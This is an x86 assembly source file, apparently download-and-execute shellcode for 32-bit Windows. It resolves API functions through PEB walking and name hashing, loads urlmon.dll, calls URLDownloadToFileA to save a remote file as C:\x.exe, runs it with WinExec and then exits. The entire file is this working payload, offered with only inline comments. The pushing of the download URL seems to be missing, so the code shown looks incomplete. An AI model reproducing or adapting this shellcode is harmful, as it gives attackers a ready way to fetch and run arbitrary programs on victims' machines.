
BITS 32

%define B2W(b1,b2)                      (((b2) << 8) + (b1))
%define W2DW(w1,w2)                     (((w2) << 16) + (w1))
%define B2DW(b1,b2,b3,b4)               (((b4) << 24) + ((b3) << 16) + ((b2) << 8) + (b1))

	JMP SHORT find_loadlibrary
find_hash: ; Find ntdll's InInitOrder list of modules:
    XOR     ESI, ESI                    ; ESI = 0
    ;PUSH    ESI                        ; Stack = 0
    MOV     ESI, [FS:ESI + 0x30]        ; ESI = &(PEB) ([FS:0x30])
    MOV     ESI, [ESI + 0x0C]           ; ESI = PEB->Ldr
    MOV     ESI, [ESI + 0x1C]           ; ESI = PEB->Ldr.InInitOrder (first module)
next_module: ; Get the baseaddress of the current module and find the next module:
    MOV     EBP, [ESI + 0x08]           ; EBP = InInitOrder[X].base_address
    MOV     ESI, [ESI]                  ; ESI = InInitOrder[X].flink == InInitOrder[X+1]
get_proc_address_loop: ; Find the PE header and export and names tables of the module:
    MOV     EBX, [EBP + 0x3C]           ; EBX = &(PE header)
    MOV     EBX, [EBP + EBX + 0x78]     ; EBX = offset(export table)
    ADD     EBX, EBP                    ; EBX = &(export table)
    MOV     ECX, [EBX + 0x18]           ; ECX = number of name pointers
    JCXZ    next_module                 ; No name pointers? Next module.
next_function_loop: ; Get the next function name for hashing:
    MOV     EDI, [EBX + 0x20]           ; EDI = offset(names table)
    ADD     EDI, EBP                    ; EDI = &(names table)
    MOV     EDI, [EDI + ECX * 4 - 4]    ; EDI = offset(function name)
    ADD     EDI, EBP                    ; EDI = &(function name)
    XOR     EAX, EAX                    ; EAX = 0
    CDQ                                 ; EDX = 0
hash_loop: ; Hash the function name and compare with requested hash
    ADD     DL, [EDI]
    ROR     EDX, 0x4
    SCASB
    JNE     hash_loop
    CMP     EDX,[ESP+4]
    LOOPNE  next_function_loop          ; Not the right hash and functions left in module? Next function
    JNE     next_module                 ; Not the right hash and no functions left in module? Next module
    ; Found the right hash: get the address of the function:
    MOV     EDX, [EBX + 0x24]           ; EDX = offset ordinals table
    ADD     EDX, EBP                    ; EDX = &oridinals table
    MOVZX   EDX, WORD [EDX + 2 * ECX]   ; EDX = ordinal number of function
    MOV     EDI, [EBX + 0x1C]           ; EDI = offset address table
    ADD     EDI, EBP                    ; EDI = &address table
    ADD     EBP, [EDI + 4 * EDX]        ; EBP = &(function)
	
	RETN
		
find_loadlibrary:
	PUSH 0x638B488E
	CALL find_hash	
	
; call loadlibrary	'urlmon.dll'
	MOV     AX, B2W('l','l')           
    PUSH    EAX                         
	PUSH    B2DW('o', 'n', '.', 'd')    
	PUSH    B2DW('u', 'r', 'l', 'm') 	  
	PUSH    ESP						 	;[ESP] = &"urlmon.dll"
	
	CALL    EBP							;Call LoadLibraryA
find_urldownloadtofile:
	PUSH 	0xF6762B83
	CALL 	find_hash
	JMP	SHORT	pre_call_dl	

dl_exec:
	PUSH	EAX							;[ESP] = 0, url, &"C:\x.exe", 0, 0 
	CALL 	EBP							; Call URLDownloadToFileA
;find_winexec:
	PUSH 	0x69CCC4E7
	CALL 	find_hash
	PUSH 	EAX							;[ESP] = 0
	DEC		ESP
	DEC		ESP
	DEC		ESP
	DEC		ESP							;[ESP] = &"C:\x.exe", 0				
	
	CALL    EBP 						; call winexec
    
;find ExiteProcess
	PUSH 	0x2A60A677
	CALL 	find_hash
	PUSH 	EAX							;[ESP] = 0
	CALL    EBP							;call ExitProcess
	
pre_call_dl:
	PUSH 	EAX							; [ESP] = 0									 
	PUSH 	B2DW('.', 'e', 'x', 'e')	; [ESP] = ".exe", 0
	PUSH    B2DW('C', ':', '\', 'x')	; [ESP] = "C:\x.exe", 0
	PUSH 	EAX							; [ESP] = 0	,"C:\x.exe", 0
	PUSH 	EAX							; [ESP] =0, 0 , "C:\x.exe", 0
	MOV		EBX,ESP						
	ADD		BL,0x8						; EBX = &"C:\x.exe"
	PUSH 	EBX							;[ESP] = &"C:\x.exe", 0, 0 
	CALL 	dl_exec